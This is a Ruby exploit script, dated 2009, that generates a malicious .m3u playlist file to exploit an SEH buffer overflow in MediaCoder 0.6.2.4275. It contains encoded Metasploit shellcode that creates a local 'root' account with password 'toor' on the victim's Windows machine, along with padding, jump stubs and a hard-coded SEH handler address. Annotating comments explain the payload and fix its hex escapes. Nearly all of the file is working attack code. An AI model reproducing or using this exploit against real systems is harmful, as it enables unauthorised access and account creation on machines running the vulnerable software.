# Title : MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
# Published : 2009-03-09
# Author : Stack
#!/usr/bin/env ruby
# MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
# Universal SEH Overwrite Exploit
# By Stack
# Mountassif Moad
# Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe
# cat Greatz.txt
# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
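# Interactive setup: record the start time and ask for the base name of the
# output file; the generated playlist is written to "<name>.m3u".
start_time = Time.new
puts "Exploit Started in Current Time :" + start_time.inspect
puts "Enter Name For your File Like : Stack"
# gets returns nil when stdin is closed (EOF); fall back to the example name
# instead of crashing on nil.chomp.
files = (gets || "Stack").chomp.capitalize
puts "Name Of File : " + files +'.m3u'
time1 = Time.new
# Silence Ruby warnings for the rest of the run.
$VERBOSE=nil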
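# M3U playlist header that precedes the overflow data (53 bytes): an "#EXTM3U"
# line, one "#EXTINF" entry, then "D:\" as the start of the over-long path
# entry. Written as a plain literal instead of hex escapes: the published copy
# had lost the backslashes of its "\x.." escapes and would have emitted the
# ASCII text "x23x45..." rather than these bytes.
Header =
  "#EXTM3U\r\n" +
  "#EXTINF:3:50,Lamb Of God - Set To Fail \r\n" +
  "D:\\"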
# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
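# Payload. Per the generator line above this is Metasploit win32_adduser
# (USER=root, PASS=toor, EXITFUNC=seh), PexAlphaNum-encoded, 489 bytes; running
# the produced .m3u on a target therefore creates a local account "root" with
# password "toor". The leading "\xeb\x03\x59..." bytes appear to be the
# encoder's decoder stub, the rest the alphanumeric body. Hex escapes restored:
# the published copy had lost their backslashes.
Shellscode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+
"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+
"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+
"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+
"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+
"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+
"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+
"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+
"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+
"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+
"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+
"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+
"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+
"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+
"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+
"\x41\x54\x46\x54\x46\x54\x42\x50\x5a"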
# Media_bruteforcer_shellcode
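# Second-stage stub appended after the SEH record ("Media_bruteforcer_shellcode"
# in the original). The author's note: use this path if the payload is not
# reached by the first method. The mnemonics are the author's own disassembly
# of the bytes and are kept as published. The stub ends in the same Shellscode
# as the first path, so both routes run the adduser payload. Hex escapes
# restored: the published copy had lost their backslashes.
Bruteforce =
  "\xD0\x62\x43"+      # SHL BYTE PTR DS:[EDX+43],1
  "\x00\xB8\x6D"+      # ADD BYTE PTR DS:[EAX+1ABBB6D],BH
  "\xBB\xAB\x01"+
  "\x00\x00"+          # ADD BYTE PTR DS:[EAX],AL
  "\x00\xF0"+          # ADD AL,DH
  "\xFF\x13"+          # CALL DWORD PTR DS:[EBX]
  "\x00\x4F\x6D"+      # ADD BYTE PTR DS:[EDI+6D],CL
  "\x81\x7C\x38\x07"+  # CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92
  "\x92\x7C\xFF"+
  "\xFF\xFF" + Shellscode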
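# Stub placed between the padding and the NOPs/Shellscode (41 bytes). The
# mnemonics are the author's own disassembly and are kept as published.
# NOTE(review): "\x93\x43" is labelled CALL ESP but decodes to XCHG EAX,EBX /
# INC EBX (CALL ESP is FF D4); the bytes are left exactly as published.
# Hex escapes restored: the published copy had lost their backslashes.
Rhunter =
  "\x5B"+              # POP EBX
  "\x90" * 10 +        # NOP x 10
  "\x90\x90"+          # NOP NOP
  "\x8D\x44\xC1\x04"+  # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4]
  "\x8B\x1E"+          # MOV EBX,DWORD PTR DS:[ESI]
  "\x89\x18"+          # MOV DWORD PTR DS:[EAX],EBX
  "\x89\x06"+          # MOV DWORD PTR DS:[ESI],EAX
  "\x42"+              # INC EDX
  "\x83\xFA\x64"+      # CMP EDX,64
  "\x75\xEC"+          # JNZ SHORT dsp_chmx.0169127E
  "\x8B\x06"+          # MOV EAX,DWORD PTR DS:[ESI]
  "\x8B\x10"+          # MOV EDX,DWORD PTR DS:[EAX]
  "\x89\x16"+          # MOV DWORD PTR DS:[ESI],EDX
  "\x5E"+              # POP ESI
  "\x5B"+              # POP EBX
  "\x93\x43"+          # labelled "CALL ESP" by the author (see note above)
  "\x92\x7c"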
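# Padding up to the SEH record (219 bytes): 195 x "A" followed by a few
# distinctive bytes, presumably markers the author used while locating the
# overwrite. Hex escapes restored: the published copy had lost their backslashes.
Over = "\x41" * 195 + "\xff\xff\xff\xff" + "\x47" * 4 + "\x42" * 6 + "\xff\xff\x47\x47\x47\xFF\x65\x78\x77\x76"
Nop = "\x90" * 8
# Next-SEH field: JMP SHORT +6 skips the two filler bytes and the 4-byte
# handler pointer, landing on the NOPs placed after the record in Xpl.
Next_Seh = "\xeb\x06\xff\xff"
# SEH handler pointer, little-endian 0x7C98B693. NOTE(review): this is one
# fixed absolute address, presumably inside a system DLL of a particular
# Windows build, so the "universal" claim only holds for targets with that
# exact DLL layout and no ASLR — confirm against the intended target.
Seh = "\x93\xB6\x98\x7C"
Nopsled = "\x90" * 7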
# Final file contents, in order: playlist header, padding, Rhunter stub, NOPs,
# payload, NOPs, the SEH record (next pointer + handler), NOPs, the fallback
# stub, NOPs.
Xpl = [Header, Over, Rhunter, Nop, Shellscode, Nopsled,
       Next_Seh, Seh, Nop, Bruteforce, Nopsled].join
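# Write the payload file. Binary mode ("wb") so that the \x0A byte inside the
# header is not expanded to \r\n on Windows and every other payload byte
# reaches the file untouched; puts is kept so the output (including its
# trailing newline) otherwise matches the original.
File.open( files+".m3u", "wb" ) do |the_file|
  the_file.puts(Xpl)
  # Report the actual completion time; the original printed a timestamp taken
  # before the file was built.
  puts "Exploit finished in Current Time :" + Time.new.inspect
  puts "Now Open " + files +".m3u :d"
end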